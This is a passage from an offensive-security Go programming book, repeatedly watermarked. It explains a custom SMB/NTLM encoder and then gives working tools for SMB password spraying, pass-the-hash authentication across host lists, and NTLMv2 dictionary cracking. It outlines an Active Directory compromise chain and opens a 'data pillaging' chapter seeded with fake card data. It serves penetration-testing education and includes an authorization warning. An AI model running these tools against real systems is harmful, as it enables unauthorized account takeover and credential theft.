{ // Custom marshallable interface found. buf, err := bm.MarshalBinary(meta) v if err != nil { return nil, err } return buf, nil } --snip-- } 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 137 --snip-- func unmarshal(buf []byte, v interface{}, meta *Metadata) (interface{}, error) { --snip-- bm, ok := v.(BinaryMarshallable) w if ok { // Custom marshallable interface found. if err := bm.UnmarshalBinary(buf, meta)x; err != nil { return nil, err } return bm, nil } --snip-- } Listing 6-3: Using type assertions to perform custom data marshaling and unmarshaling (/ch-6/smb/smb /encoder/encoder.go) Listing 6-3 details only a subsection of the marshal() and unmarshal() functions taken from https://github.com/blackhat-go/bhg/blob/master/ch-6/smb /smb/encoder /encoder.go. Both functions contain a similar section of code that attempts to assert the supplied interface, v, to a BinaryMarshallable variable named bm uw. This succeeds only if whatever type v is actually implements the necessary functions required by your BinaryMarshallable interface. If it succeeds, your marshal() function v makes a call to bm.MarshalBinary(), and your unmarshal() function x makes a call to bm.UnmarshalBinary(). At this point, your program flow will branch off into the type’s encoding and decoding logic, allowing a type to maintain complete control over the way it’s handled. Forcing ASN.1 Encoding Let’s look at how to force your Foo type to be ASN.1 encoded, while leaving other fields in your Message struct as-is. To do this, you need to define the MarshalBinary() and UnmarshalBinary() functions on the type, as in Listing 6-4. func (f *Foo) MarshalBinary(meta *encoder.Metadata) ([]byte, error) { buf, err := asn1.Marshal(*f)u if err != nil { return nil, err } return buf, nil } func (f *Foo) UnmarshalBinary(buf []byte, meta *encoder.Metadata) error { data := Foo{} if _, err := asn1.Unmarshal(buf, &data)v; err != nil { return err } *f = data return nil } Listing 6-4: Implementing the BinaryMarshallable interface for ASN.1 encoding 前沿信安资讯阵地 公众号:i nf osrc 138 Chapter 6 The methods don’t do much besides make calls to Go’s asn1.Marshal() u and asn1.Unmarshal() v functions. You can find variations of these functions within the gss package code at https://github.com/blackhat-go/bhg/blob/master /ch-6/smb/gss/gss.go. The only real difference between them is that the gss package code has additional tweaks to make Go’s asn1 encoding function play nicely with the data format defined within the SMB spec. The ntlmssp package at https://github.com/blackhat-go/bhg/blob/master /ch-6/smb/ntlmssp/ntlmssp.go contains an alternative implementation of the MarshalBinary() and Unmarshal Binary() functions. Although it doesn’t demon- strate ASN.1 encoding, the ntlmssp code shows how to handle encoding of an arbitrary data type by using necessary metadata. The metadata—the lengths and offsets of variable-length byte slices—is pertinent to the encoding pro- cess. This metadata leads us to the next challenge you need to address. Understanding Metadata and Referential Fields If you dig into the SMB specification a little, you’ll find that some messages contain fields that reference other fields of the same message. For example, the fields—taken from the Negotiate response message—refer to the offset and length of a variable-length byte slice that contains the actual value: SecurityBufferOffset (2 bytes): The offset, in bytes, from the beginning of the SMB2 header to the security buffer. SecurityBufferLength (2 bytes): The length, in bytes, of the security buffer. These fields essentially act as metadata. Later in the message spec, you find the variable-length field within which your data actually resides: Buffer (variable): The variable-length buffer that contains the security buffer for the response, as specified by Security BufferOffset and SecurityBufferLength. The buffer SHOULD contain a token as produced by the GSS protocol as specified in section If SecurityBufferLength is 0, this field is empty and client-initiated authentication, with an authen- tication protocol of the client’s choice, will be used instead of server-initiated SPNEGO authentication, as described in [MS-AUTHSOD] section Generally speaking, this is how the SMB spec consistently handles variable- length data: fixed-position length and offset fields depicting the size and location of the data itself. This is not specific to response messages or the Negotiate message, and often you’ll find multiple fields within a single message using this pattern. Really, anytime you have a variable-length field, you’ll find this pattern. The metadata explicitly instructs the message receiver on how to locate and extract the data. This is useful, but it complicates your encoding strategy because you now need to maintain a relationship between different fields within a struct. You can’t, for example, just marshal an entire message because 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 139 some of the metadata fields—for example, length and offset—won’t be known until the data itself is marshaled or, in the case of the offset, all fields preceding the data are marshaled. Understanding the SMB Implementation The remainder of this subsection addresses some of the ugly details regard- ing the SMB implementation we devised. You don’t need to understand this information to use the package. We played around with a variety of approaches to handle referential data, eventually settling on a solution that utilizes a combination of struc- ture field tags and reflection. Recall that reflection is a technique through which a program can inspect itself, particularly examining things like its own data types. Field tags are somewhat related to reflection in that they define arbitrary metadata about a struct field. You may recall them from previous XML, MSGPACK, or JSON encoding examples. For example, Listing 6-5 uses struct tags to define JSON field names. type Foo struct { A int `json:"a"` B string `json:"b"` } Listing 6-5: A struct defining JSON field tags Go’s reflect package contains the functions we used to inspect data types and extract field tags. At that point, it was a matter of parsing the tags and doing something meaningful with their values. In Listing 6-6, you can see a struct defined in the SMB package. type NegotiateRes struct { Header StructureSize uint16 SecurityMode uint16 DialectRevision uint16 Reserved uint16 ServerGuid []byte `smb:"fixed:16"`u Capabilities uint32 MaxTransactSize uint32 MaxReadSize uint32 MaxWriteSize uint32 SystemTime uint64 ServerStartTime uint64 SecurityBufferOffset uint16 `smb:"offset:SecurityBlob"`v SecurityBufferLength uint16 `smb:"len:SecurityBlob"`w Reserved2 uint32 SecurityBlob *gss.NegTokenInit } Listing 6-6: Using SMB field tags for defining field metadata (/ch-6/smb/smb/smb.go) 前沿信安资讯阵地 公众号:i nf osrc 140 Chapter 6 This type uses three field tags, identified by the SMB key: fixed u, offset v, and len w. Keep in mind that we chose all these names arbitrarily. You aren’t obligated to use a specific name. The intent of each tag is as follows: • fixed identifies a []byte as a fixed-length field of the provided size. In this case, ServerGuid is 16 bytes in length. • offset defines the number of bytes from the beginning of the struct to the first position of a variable-length data buffer. The tag defines the name of the field—in this case, SecurityBlob—to which the offset relates. A field by this referenced name is expected to exist in the same struct. • len defines the length of a variable-length data buffer. The tag defines the name of the field—in this case, SecurityBlob, to which the length relates. A field by this referenced name should exist in the same struct. As you might have noticed, our tags allow us not only to create rela- tionships—through arbitrary metadata—between different fields, but also to differentiate between fixed-length byte slices and variable-length data. Unfortunately, adding these struct tags doesn’t magically fix the problem. The code needs to have the logic to look for these tags and take specific actions on them during marshaling and unmarshaling. Parsing and Storing Tags In Listing 6-7, the convenience function, called parseTags(), performs the tag-parsing logic and stores the data in a helper struct of type TagMap. func parseTags(sf reflect.StructFieldu) (*TagMap, error) { ret := &TagMap{ m: make(map[string]interface{}), has: make(map[string]bool), } tag := sf.Tag.Get("smb")v smbTags := strings.Split(tag, ",")w for _, smbTag := range smbTagsx { tokens := strings.Split(smbTag, ":")y switch tokens[0] { z case "len", "offset", "count": if len(tokens) != 2 { return nil, errors.New("Missing required tag data. Expecting key:val") } ret.Set(tokens[0], tokens[1]) case "fixed": if len(tokens) != 2 { return nil, errors.New("Missing required tag data. Expecting key:val") } i, err := strconv.Atoi(tokens[1]) if err != nil { return nil, err 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 141 } ret.Set(tokens[0], i) { } Listing 6-7: Parsing structure tags (/ch-6/smb/smb/encoder/encoder.go) The function accepts a parameter named sf of type reflect.StructField u, which is a type defined within Go’s reflect package. The code calls sf.Tag .Get("smb") on the StructField variable to retrieve any smb tags defined on the field v. Again, this is an arbitrary name we chose for our program. We just need to make sure that the code to parse the tags is using the same key as the one we used in our struct’s type definition. We then split the smb tags on a comma w, in case we need to have multiple smb tags defined on a single struct field in the future, and loop through each tag x. We split each tag on a colon y—recall that we used the format name:value for our tags, such as fixed:16 and len:SecurityBlob. With the individual tag data separated into its basic key and value pairing, we use a switch statement on the key to perform key-specific validation logic, such as converting values to integers for fixed tag values z. Lastly, the function sets the data in our custom map named ret {. Invoking the parseTags() Function and Creating a reflect.StructField Object Now, how do we invoke the function, and how do we create an object of type reflect.StructField? To answer these questions, look at the unmarshal() function in Listing 6-8, which is within the same source file that has our parseTags() convenience function. The unmarshal() function is extensive, so we’ll just piece together the most relevant portions. func unmarshal(buf []byte, v interface{}, meta *Metadata) (interface{}, error) { typev := reflect.TypeOf(v) u valuev := reflect.ValueOf(v) v --snip-- r := bytes.NewBuffer(buf) switch typev.Kind() { w case reflect.Struct: --snip-- case reflect.Uint8: --snip-- case reflect.Uint16: --snip-- case reflect.Uint32: --snip-- case reflect.Uint64: --snip-- case reflect.Slice, reflect.Array: --snip-- default: return errors.New("Unmarshal not implemented for kind:" + typev.Kind().String()), nil } 前沿信安资讯阵地 公众号:i nf osrc 142 Chapter 6 return nil, nil } Listing 6-8: Using reflection to dynamically unmarshal unknown types (/ch-6/smb/smb /encoder/encoder.go) The unmarshal() function uses Go’s reflect package to retrieve the type u and value v of the destination interface to which our data buffer will be unmarshaled. This is necessary because in order to convert an arbitrary byte slice into a struct, we need to know how many fields are in the struct and how many bytes to read for each field. For example, a field defined as uint16 consumes 2 bytes, whereas a uint64 consumes 8 bytes. By using reflec- tion, we can interrogate the destination interface to see what data type it is and how to handle the reading of data. Because the logic for each type will differ, we perform a switch on the type by calling typev.Kind() w, which returns a reflect.Kind instance indicating the kind of data type we’re work- ing with. You’ll see that we have a separate case for each of the allowed data types. Handling Structs Let’s look at the case block, in Listing 6-9, that handles a struct type, since that is a likely initial entry point. case reflect.Struct: m := &Metadata{ u Tags: &TagMap{}, Lens: make(map[string]uint64), Parent: v, ParentBuf: buf, Offsets: make(map[string]uint64), CurrOffset: 0, } for i := 0; i < typev.NumField(); i++ { v m.CurrField = typev.Field(i).Namew tags, err := parseTags(typev.Field(i))x if err != nil { return nil, err } m.Tags = tags var data interface{} switch typev.Field(i).Type.Kind() { y case reflect.Struct: data, err = unmarshal(buf[m.CurrOffset:], valuev.Field(i).Addr().Interface(), m)z default: data, err = unmarshal(buf[m.CurrOffset:], valuev.Field(i).Interface(), m){ } if err != nil { return nil, err } valuev.Field(i).Set(reflect.ValueOf(data)) | } 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 143 v = reflect.Indirect(reflect.ValueOf(v)).Interface() meta.CurrOffset += m.CurrOffset } return v, nil Listing 6-9: Unmarshaling a struct type (/ch-6/smb/smb/encoder/encoder.go) The case block begins by defining a new Metadata object u, a type used to track relevant metadata, including the current buffer offset, field tags, and other information. Using our type variable, we call the NumField() method to retrieve the number of fields within the struct v. It returns an integer value that acts as the constraint for a loop. Within the loop, we can extract the current field through a call to the type’s Field(index int) method. The method returns a reflect.StructField type. You’ll see we use this method a few times throughout this code snippet. Think of it as retrieving an element from a slice by index value. Our first usage w retrieves the field to extract the field’s name. For example, Security BufferOffset and SecurityBlob are field names within the NegotiateRes struct defined in Listing 6-6. The field name is assigned to the CurrField property of our Metadata object. The second call to the Field(index int) method is inputted to the parseTags() function x from Listing 6-7. We know this func- tion parses our struct field tags. The tags are included in our Metadata object for later tracking and usage. Next, we use a switch statement to act specifically on the field type y. There are only two cases. The first handles instances where the field itself is a struct z, in which case, we make a recursive call to the unmarshal() function, passing to it a pointer to the field as an interface. The second case handles all other kinds (primitives, slices, and so on), recursively calling the unmarshal() function and passing it the field itself as an interface {. Both calls do some funny business to advance the buffer to start at our current offset. Our recursive call eventually returns an interface{}, which is a type that contains our unmarshaled data. We use reflection to set our current field’s value to the value of this interface data |. Lastly, we advance our current offset in the buffer }. Yikes! Can you see how this can be a challenge to develop? We have a separate case for every kind of input. Luckily, the case block that handles a struct is the most complicated. Handling uint16 If you are really paying attention, you’re probably asking: where do you actually read data from the buffer? The answer is nowhere in Listing 6-9. Recall that we are making recursive calls to the unmarshal() function, and each time, we pass the inner fields to the function. Eventually we’ll reach primitive data types. After all, at some point, the innermost nested structs are composed of basic data types. When we encounter a basic data type, our code will match against a different case in the outermost switch state- ment. For example, when we encounter a uint16 data type, this code exe- cutes the case block in Listing 6-10. 前沿信安资讯阵地 公众号:i nf osrc 144 Chapter 6 case reflect.Uint16: var ret uint16 if err := binary.Read(r, binary.LittleEndian, &ret)u; err != nil { return nil, err } if meta.Tags.Has("len")v { ref, err := meta.Tags.GetString("len")w if err != nil { return nil, err } meta.Lens[ref]x = uint64(ret) } y meta.CurrOffset += uint64(binary.Size(ret)) return ret, nil Listing 6-10: Unmarshaling uint16 data (/ch-6/smb/smb/encoder /encoder.go/) In this case block, we make a call to binary.Read() in order to read data from our buffer into a variable, ret u. This function is smart enough to know how many bytes to read, based off the type of the destination. In this case, ret is a uint16, so 2 bytes are read. Next, we check whether the len field tag is present v. If it is, we retrieve the value—that is, a field name—tied to that key w. Recall that this value will be a field name to which the current field is expected to refer. Because the length-identifying fields precede the actual data in the SMB messages, we don’t know where the buffer data actually resides, and so we can’t take any action yet. We’ve just acquired length metadata, and there’s no better place to store it than in our Metadata object. We store it within a map[string]uint64 that maintains a relationship of reference field names to their lengths x. Phrased another way, we now know how long a variable-length byte slice needs to be. We advance the current offset by the size of the data we just read y, and return the value read from the buffer. Similar logic and metadata tracking happen in the process of handling the offset tag information, but we omitted that code for brevity. Handling Slices In Listing 6-11, you can see the case block that unmarshals slices, which we need to account for both fixed- and variable-length data while using tags and metadata in the process. case reflect.Slice, reflect.Array: switch typev.Elem().Kind()u { case reflect.Uint8: var length, offset int v var err error if meta.Tags.Has("fixed") { if length, err = meta.Tags.GetInt("fixed")w; err != nil { return nil, err } 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 145 // Fixed length fields advance current offset meta.CurrOffset += uint64(length) x } else { if val, ok := meta.Lens[meta.CurrField]y; ok { length = int(val) } else { return nil, errors.New("Variable length field missing length reference in struct") } if val, ok := meta.Offsets[meta.CurrField]z; ok { offset = int(val) } else { // No offset found in map. Use current offset offset = int(meta.CurrOffset) } // Variable length data is relative to parent/outer struct. // Reset reader to point to beginning of data r = bytes.NewBuffer(meta.ParentBuf[offset : offset+length]) // Variable length data fields do NOT advance current offset. } data := make([]byte, length) { if err := binary.Read(r, binary.LittleEndian, &data)|; err != nil { return nil, err } return data, nil Listing 6-11: Unmarshaling fixed- and variable-length byte slices (/ch-6/smb/smb /encoder/encoder.go/) First, we use reflection to determine the slice’s element type u. For example, handling of []uint8 is different from []uint32, as the number of bytes per element differs. In this case, we’re handling only []uint8 slices. Next, we define a couple of local variables, length and offset, to use for tracking the length of the data to read and the offset within the buffer from which to begin reading v. If the slice is defined with the fixed tag, we retrieve the value and assign it to length w. Recall that the tag value for the fixed key is an integer that defines the length of the slice. We’ll use this length to advance the current buffer offset for future reads x. For fixed-length fields, the offset is left as its default value—zero—since it will always appear at the current offset. Variable-length slices are slightly more complex because we retrieve both the length y and offset z information from our Metadata structure. A field uses its own name as the key for the lookup of the data. Recall how we populated this information previously. With our length and offset variables properly set, we then create a slice of the desired length { and use it in a call to binary.Read() |. Again, this function is smart enough to read bytes up until our destination slice has been filled. This has been an exhaustingly detailed journey into the dark recesses of custom tags, reflection, and encoding with a hint of SMB. Let’s move beyond this ugliness and do something useful with the SMB library. Thankfully, the following use cases should be significantly less complicated. 前沿信安资讯阵地 公众号:i nf osrc 146 Chapter 6 Guessing Passwords with SMB The first SMB case we’ll examine is a fairly common one for attackers and pen testers: online password guessing over SMB. You’ll try to authenti- cate to a domain by providing commonly used usernames and passwords. Before diving in, you’ll need to grab the SMB package with the following get command: $ go get github.com/bhg/ch-6/smb Once the package is installed, let’s get to coding. The code you’ll create (shown in Listing 6-12) accepts a file of newline-separated usernames, a password, a domain, and target host information as command line argu- ments. To avoid locking accounts out of certain domains, you’ll attempt a single password across a list of users rather than attempt a list of passwords across one or more users. W A R N I N G Online password guessing can lock accounts out of a domain, effectively resulting in a denial-of-service attack. Take caution when testing your code and run this against only systems on which you’re authorized to test. func main() { if len(os.Args) != 5 { log.Fatalln("Usage: main </user/file> <password> <domain> <target_host>") } buf, err := ioutil.ReadFile(os.Args[1]) if err != nil { log.Fatalln(err) } options := smb.Optionsu{ Password: os.Args[2], Domain: os.Args[3], Host: os.Args[4], Port: 445, } users := bytes.Split(buf, []byte{'\n'}) for _, user := range usersv { w options.User = string(user) session, err := smb.NewSession(options, false)x if err != nil { fmt.Printf("[-] Login failed: %s\\%s [%s]\n", options.Domain, options.User, options.Password) continue } 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 147 defer session.Close() if session.IsAuthenticatedy { fmt.Printf("[+] Success : %s\\%s [%s]\n", options.Domain, options.User, options.Password) } } } Listing 6-12: Leveraging the SMB package for online password guessing (/ch-6/password -guessing/main.go) The SMB package operates on sessions. To establish a session, you first initialize an smb.Options instance that will contain all your session options, including target host, user, password, port, and domain u. Next, you loop through each of your target users v, setting the options.User value appro- priately w, and issue a call to smb.NewSession() x. This function does a lot of heavy lifting for you behind the scenes: it negotiates both the SMB dialect and authentication mechanism, and then authenticates to the remote tar- get. The function will return an error if authentication fails, and a boolean IsAuthenticated field on the session struct is populated based off the out- come. It will then check the value to see whether the authentication suc- ceeded, and if it did, display a success message y. That is all it takes to create an online password-guessing utility. Reusing Passwords with the Pass-the-Hash Technique The pass-the-hash technique allows an attacker to perform SMB authentica- tion by using a password’s NTLM hash, even if the attacker doesn’t have the cleartext password. This section walks you through the concept and shows you an implementation of it. Pass-the-hash is a shortcut to a typical Active Directory domain compromise, a type of attack in which attackers gain an initial foothold, elevate their privileges, and move laterally throughout the network until they have the access levels they need to achieve their end goal. Active Directory domain compromises generally follow the roadmap presented in this list, assuming they take place through an exploit rather than something like password guessing: 1. The attacker exploits the vulnerability and gains a foothold on the network. 2. The attacker elevates privileges on the compromised system. 3. The attacker extracts hashed or cleartext credentials from LSASS. 4. The attacker attempts to recover the local administrator password via offline cracking. 前沿信安资讯阵地 公众号:i nf osrc 148 Chapter 6 5. The attacker attempts to authenticate to other machines by using the administrator credentials, looking for reuse of the password. 6. The attacker rinses and repeats until the domain administrator or other target has been compromised. With NTLMSSP authentication, however, even if you fail to recover the cleartext password during step 3 or 4, you can proceed to use the pass- word’s NTLM hash for SMB authentication during step 5—in other words, passing the hash. Pass-the-hash works because it separates the hash calculation from the challenge-response token calculation. To see why this is, let’s look at the fol- lowing two functions, defined by the NTLMSSP specification, pertaining to the cryptographic and security mechanisms used for authentication: NTOWFv2 A cryptographic function that creates an MD5 HMAC by using the username, domain, and password values. It generates the NTLM hash value. ComputeResponse A function that uses the NTLM hash in combina- tion with the message’s client and server challenges, timestamp, and target server name to produce a GSS-API security token that can be sent for authentication. You can see the implementations of these functions in Listing 6-13. func Ntowfv2(pass, user, domain string) []byte { h := hmac.New(md5.New, Ntowfv1(pass)) h.Write(encoder.ToUnicode(strings.ToUpper(user) + domain)) return h.Sum(nil) } func ComputeResponseNTLMv2(nthashu, lmhash, clientChallenge, serverChallenge, timestamp, serverName []byte) []byte { temp := []byte{1, 1} temp = append(temp, 0, 0, 0, 0, 0, 0) temp = append(temp, timestamp...) temp = append(temp, clientChallenge...) temp = append(temp, 0, 0, 0, 0) temp = append(temp, serverName...) temp = append(temp, 0, 0, 0, 0) h := hmac.New(md5.New, nthash) h.Write(append(serverChallenge, temp...)) ntproof := h.Sum(nil) return append(ntproof, temp...) } Listing 6-13: Working with NTLM hashes (/ch-6/smb/ntlmssp/crypto.go) The NTLM hash is supplied as input to the ComputeResponseNTLMv2 function u, meaning the hash has been created independently of the logic used for security token creation. This implies that hashes stored 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 149 anywhere—even in LSASS—are considered precalculated, because you don’t need to supply the domain, user, or password as input. The authenti- cation process is as follows: 1. Calculate the user’s hash by using the domain, user, and password values. 2. Use the hash as input to calculate authentication tokens for NTLMSSP over SMB. Since you already have a hash in hand, you’ve already completed step 1. To pass the hash, you initiate your SMB authentication sequence, as you defined it way back in the opening sections of this chapter. However, you never calculate the hash. Instead, you use the supplied value as the hash itself. Listing 6-14 shows a pass-the-hash utility that uses a password hash to attempt to authenticate as a specific user to a list of machines. func main() { if len(os.Args) != 5 { log.Fatalln("Usage: main <target/hosts> <user> <domain> <hash>") } buf, err := ioutil.ReadFile(os.Args[1]) if err != nil { log.Fatalln(err) } options := smb.Options{ User: os.Args[2], Domain: os.Args[3], Hashu: os.Args[4], Port: 445, } targets := bytes.Split(buf, []byte{'\n'}) for _, target := range targetsv { options.Host = string(target) session, err := smb.NewSession(options, false) if err != nil { fmt.Printf("[-] Login failed [%s]: %s\n", options.Host, err) continue } defer session.Close() if session.IsAuthenticated { fmt.Printf("[+] Login successful [%s]\n", options.Host) } } } Listing 6-14: Passing the hash for authentication testing (/ch-6 /password-reuse/main.go) 前沿信安资讯阵地 公众号:i nf osrc 150 Chapter 6 This code should look similar to the password-guessing example. The only significant differences are that you’re setting the Hash field of smb.Options (not the Password field) u and you’re iterating over a list of target hosts (rather than target users) v. The logic within the smb.NewSession() function will use the hash value if populated within the options struct. Recovering NTLM Passwords In some instances, having only the password hash will be inadequate for your overall attack chain. For example, many services (such as Remote Desktop, Outlook Web Access, and others) don’t allow hash-based authen- tication, because it either isn’t supported or isn’t a default configuration. If your attack chain requires access to one of these services, you’ll need a cleartext password. In the following sections, you’ll walk through how hashes are calculated and how to create a basic password cracker. Calculating the Hash In Listing 6-15, you perform the magic of calculating the hash. func NewAuthenticatePass(domain, user, workstation, password string, c Challenge) Authenticate { // Assumes domain, user, and workstation are not unicode nthash := Ntowfv2(password, user, domain) lmhash := Lmowfv2(password, user, domain) return newAuthenticate(domain, user, workstation, nthash, lmhash, c) } func NewAuthenticateHash(domain, user, workstation, hash string, c Challenge) Authenticate { // Assumes domain, user, and workstation are not unicode buf := make([]byte, len(hash)/2) hex.Decode(buf, []byte(hash)) return newAuthenticate(domain, user, workstation, buf, buf, c) } Listing 6-15: Calculating hashes (/ch-6/smb/ntlmssp/ntlmssp.go) The logic to call the appropriate function is defined elsewhere, but you’ll see that the two functions are similar. The real difference is that password-based authentication in the NewAuthenticatePass() function com- putes the hash before generating the authentication message, whereas the NewAuthenticateHash() function skips that step and uses the supplied hash directly as input to generate the message. Recovering the NTLM Hash In Listing 6-16, you can see a utility that recovers a password by cracking a supplied NTLM hash. func main() { if len(os.Args) != 5 { 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 151 log.Fatalln("Usage: main <dictionary/file> <user> <domain> <hash>") } hash := make([]byte, len(os.Args[4])/2) _, err := hex.Decode(hash, []byte(os.Args[4]))u if err != nil { log.Fatalln(err) } f, err := ioutil.ReadFile(os.Args[1]) if err != nil { log.Fatalln(err) } var found string passwords := bytes.Split(f, []byte{'\n'}) for _, password := range passwordsv { h := ntlmssp.Ntowfv2(string(password), os.Args[2], os.Args[3]) w if bytes.Equal(hash, h)x { found = string(password) break } } if found != "" { fmt.Printf("[+] Recovered password: %s\n", found) } else { fmt.Println("[-] Failed to recover password") } } Listing 6-16: NTLM hash cracking (/ch-6/password-recovery /main.go) The utility reads the hash as a command line argument, decoding it to a []byte u. Then you loop over a supplied password list v, calculating the hash of each entry by calling the ntlmssp.Ntowfv2() function we discussed previously w. Finally, you compare the calculated hash with that of our sup- plied value x. If they match, you have a hit and break out of the loop. Summary You’ve made it through a detailed examination of SMB, touching on proto- col specifics, reflection, structure field tags, and mixed encoding! You also learned how pass-the-hash works, as well as a few useful utility programs that leverage the SMB package. To continue your learning, we encourage you to explore additional SMB communications, particularly in relation to remote code execution, such as PsExec. Using a network sniffer, such as Wireshark, capture the packets and evaluate how this functionality works. In the next chapter, we move on from network protocol specifics to focus on attacking and pillaging databases. 前沿信安资讯阵地 公众号:i nf osrc 前沿信安资讯阵地 公众号:i nf osrc Now that we’ve covered the majority of common network protocols used for active service interrogation, command and control, and other malicious activity, let’s switch our focus to an equally important topic: data pillaging. Although data pillaging may not be as exciting as initial exploitation, lateral network movement, or privilege escalation, it’s a critical aspect of the overall attack chain. After all, we often need data in order to perform those other activities. Commonly, the data is of tangible worth to an attacker. Although hacking an organization is thrilling, the data itself is often a lucrative prize for the attacker and a damning loss for the organization. Depending on which study you read, a breach in 2020 can cost an orga- nization approximately $4 to $7 million. An IBM study estimates it costs an organization $129 to $355 per record stolen. Hell, a black hat hacker can make some serious coin off the underground market by selling credit cards at a rate of $7 to $80 per card (http://online.wsj.com/public/resources/documents /secureworks_hacker_annualreport.pdf). 7 A BU SING DATA B A SE S A N D F IL E S Y S T E M S 前沿信安资讯阵地 公众号:i nf osrc 154 Chapter 7 The Target breach alone resulted in a compromise of 40 million cards. In some cases, the Target cards were sold for as much as $135 per card (http://www.businessinsider.com/heres-what-happened-to-your-target-data-that-was -hacked-2014-10/). That’s pretty lucrative. We, in no way, advocate that type of activity, but folks with a questionable moral compass stand to make a lot of money from data pillaging. Enough about the industry and fancy references to online articles—let’s pillage! In this chapter, you’ll learn to set up and seed a variety of SQL and NoSQL databases and learn to connect and interact with those databases via Go. We’ll also demonstrate how to create a database and filesystem data miner that searches for key indicators of juicy information. Setting Up Databases with Docker In this section, you’ll install various database systems and then seed them with the data you’ll use in this chapter’s pillaging examples. Where pos- sible, you’ll use Docker on an Ubuntu 18.04 VM. Docker is a software con- tainer platform that makes it easy to deploy and manage applications. You can bundle applications and their dependencies in a manner that makes their deployment straightforward. The container is compartmentalized from the operating system in order to prevent the pollution of the host platform. This is nifty stuff. And for this chapter, you will use a variety of prebuilt Docker images for the databases you’ll be working with. If you don’t have it already, install Docker. You can find Ubuntu instructions at https://docs.docker.com/install /linux/docker-ce/ubuntu/. N O T E We’ve specifically chosen to omit details on setting up an Oracle instance. Although Oracle provides VM images that you can download and use to create a test database, we felt that it was unnecessary to walk you through these steps, since they’re fairly similar to the MySQL examples below. We’ll leave the Oracle-specific implementation as an exercise for you to do independently. Installing and Seeding MongoDB MongoDB is the only NoSQL database that you’ll use in this chapter. Unlike traditional relational databases, MongoDB doesn’t communicate via SQL. Instead, MongoDB uses an easy-to-understand JSON syntax for retrieving and manipulating data. Entire books have been dedicated to explaining MongoDB, and a full explanation is certainly beyond the scope of this book. For now, you’ll install the Docker image and seed it with fake data. Unlike traditional SQL databases, MongoDB is schema-less, which means that it doesn’t follow a predefined, rigid rule system for organizing table data. This explains why you’ll see only insert commands in Listing 7-1 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 155 without any schema definitions. First, install the MongoDB Docker image with the following command: $ docker run --name some-mongo -p 27017:27017 mongo This command downloads the image named mongo from the Docker repository, spins up a new instance named some-mongo—the name you give the instance is arbitrary—and maps local port 27017 to the container port 27017. The port mapping is key, as it allows us to access the database instance directly from our operating system. Without it, it would be inaccessible. Check that the container started automatically by listing all the run- ning containers: $ docker ps In the event your container doesn’t start automatically, run the follow- ing command: $ docker start some-mongo The start command should get the container going. Once your container starts, connect to the MongoDB instance by using the run command—passing it the MongoDB client; that way, you can inter- act with the database to seed data: $ docker run -it --link some-mongo:mongo --rm mongo sh \ -c 'exec mongo "$MONGO_PORT_27017_TCP_ADDR:$MONGO_PORT_27017_TCP_PORT/store"' > This magical command runs a disposable, second Docker container that has the MongoDB client binary installed—so you don’t have to install the binary on your host operating system—and uses it to connect to the some-mongo Docker container’s MongoDB instance. In this example, you’re connecting to a database named test. In Listing 7-1, you insert an array of documents into the transactions collection. (All the code listings at the root location of / exist under the provided github repo https://github.com/blackhat-go/bhg/.) > db.transactions.insert([ { "ccnum" : "4444333322221111", "date" : "2019-01-05", "amount" : 100.12, "cvv" : "1234", "exp" : "09/2020" }, 前沿信安资讯阵地 公众号:i nf osrc 156 Chapter 7 { "ccnum" : "4444123456789012", "date" : "2019-01-07", "amount" : 2400.18, "cvv" : "5544", "exp" : "02/2021" }, { "ccnum" : "4465122334455667", "date" : "2019-01-29", "amount" : 1450.87, "cvv" : "9876", "exp" : "06/2020" } ]); Listing 7-1: Inserting transactions into a MongoDB collection (/ch-7/db/seed-mongo.js) That’s it! You’ve now created your MongoDB database instance and seeded it with a transactions collection that contains three fake documents for querying. You’ll get to the querying part in a bit, but first, you should know how to install and seed traditional SQL databases. Installing and Seeding PostgreSQL and MySQL Databases PostgreSQL (also called Postgres) and MySQL are probably the two most common, well-known, enterprise-quality, open source relational database management systems, and official Docker images exist for both. Because of their similarity and the general overlap in their installation steps, we batched together installation instructions for both here. First, much in the same way as for the MongoDB example in the previ- ous section, download and run the appropriate Docker image: $ docker run --name some-mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=password -d mysql $ docker run --name some-postgres -p 5432:5432 -e POSTGRES_PASSWORD=password -d postgres After your containers are built, confirm they are running, and if they aren’t, you can start them via the docker start name command. Next, you can connect to the containers from the appropriate client— again, using the Docker image to prevent installing any additional files on the host—and proceed to create and seed the database. In Listing 7-2, you can see the MySQL logic. $ docker run -it --link some-mysql:mysql --rm mysql sh -c \ 'exec mysql -h "$MYSQL_PORT_3306_TCP_ADDR" -P"$MYSQL_PORT_3306_TCP_PORT" \ -uroot -p"$MYSQL_ENV_MYSQL_ROOT_PASSWORD"' mysql> create database store; mysql> use store; mysql> create table transactions(ccnum varchar(32), date date, amount float(7,2), -> cvv char(4), exp date); Listing 7-2: Creating and initializing a MySQL database 前沿信安资讯阵地 公众号:i nf osrc Abusing Databases and Filesystems 157 The listing, like the one that follows, starts a disposable Docker shell that executes the appropriate database client binary. It creates and connects to the database named store and then creates a table named transactions. The two listings are identical, with the exception that they are tailored to different database systems. In Listing 7-3, you can see the Postgres logic, which differs slightly in syntax from MySQL. $ docker run -it --rm --link some-postgres:postgres postgres psql -h postgres -U postgres postgres=# create database store; postgres=# \connect store store=# create table transactions(ccnum varchar(32), date date, amount money, cvv char(4), exp date); Listing 7-3: Creating and initializing a Postgres database In both MySQL and Postgres, the syntax is identical for inserting your transactions. For example, in Listing 7-4, you can see how to insert three documents into a MySQL transactions collection. mysql> insert into transactions(ccnum, date, amount, cvv, exp) values -> ('4444333322221111', '2019-01-05', 100.12, '1234', '2020-09-01'); mysql> insert into transactions(ccnum, date, amount, cvv, exp) values -> ('4444123456789012', '2019-01-07', 2400.18, '5544', '2021-02-01'); mysql> insert into transactions(ccnum, date, amount, cvv, exp) values -> ('4465122334455667', '2019-01-29', 1450.87, '9876', '2019-06-01'); Listing 7-4: Inserting transactions into MySQL databases (/ch-7/db/seed-pg-mysql.sql) Try inserting the same three documents into your Postgres database. 